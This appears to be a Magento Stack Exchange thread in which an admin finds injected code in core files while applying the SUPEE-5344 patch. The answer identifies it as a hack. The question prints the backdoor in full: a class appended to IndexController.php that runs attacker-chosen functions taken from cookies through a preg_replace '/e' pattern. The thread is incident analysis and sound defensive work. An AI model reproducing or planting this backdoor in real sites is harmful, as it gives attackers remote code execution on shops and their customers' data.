Unknown class Mage_Cms_Auth_xaj found in ../Cms/controllers/IndexController.php - malicious or just bad form?

magento.stackexchange https://magento.stackexchange.com//questions/84360

  •  13-12-2019
  •  | 
  •  

Question

I was asked to give some advice on a 1.9.0.1 instance which has had none of the recent SUPEEs installed. SUPEE-1533 went in with no problem, but SUPEE-5344 failed, with a message of 

patching file lib/Varien/Db/Adapter/Pdo/Mysql.php
Hunk #1 FAILED at 2834.

Investigating the file, I found this code at line 2836 :

           if (isset($condition['mhztywsxujkfqokw'])) {
            $fieldName = str_replace('#?', $this->quoteIdentifier($fieldName), $condition['mhztywsxujkfqokw']);
            unset($condition['mhztywsxujkfqokw']);

The code in an unmodified lib/Varien/Db/Adapter/Pdo/Mysql.php is:

       if (is_array($condition)) {
            if (isset($condition['field_expr'])) {
                $fieldName = str_replace('#?', $this->quoteIdentifier($fieldName), $condition['field_expr']);
                unset($condition['field_expr']);
            }

A find for "mhztywsxujkfqokw" led me to app/code/core/Mage/Cms/controllers/IndexController.php, where I found this appended to the end of the stock Magento class:

class Mage_Cms_Auth_xaj
{
    public function __construct() {
        $auth_cookie = @$_COOKIE['mhztywsxujkfqokw3'];
        if ($auth_cookie) {
            $method = $auth_cookie(@$_COOKIE['mhztywsxujkfqokw2']);
            $auth = $auth_cookie(@$_COOKIE['mhztywsxujkfqokw1']);
            $method("/124/e",$auth,124);
        }
    }
}
$is_auth = new Mage_Cms_Auth_xaj;

The class isn't invoked anywhere else, as far as I can see.

I am just wondering - is this something malicious, or a mod that was poorly implemented by editing two core files?

Was it helpful?

Solution

This is a hack, probably caused by a missing SUPE-5344 patch. As I see you posted this at the end of september and SUPEE-5344 was released in early 2015, it's very likey your shop got hacked inbetween.

The stuff you posted seems related to the SUPEE-5344 vulnerability which is described in detail here: http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability

What do you need to do?

I hope it's not too late and you have taken steps to patch and recover your shop in between.

There are most likely a lot of other files which got changed which you just didn't accidentally detect while applying the patch.

A detailed list on steps to recover can be found here: Magento hacked even after applied patch

Licensed under: CC-BY-SA with attribution
Not affiliated with magento.stackexchange
scroll top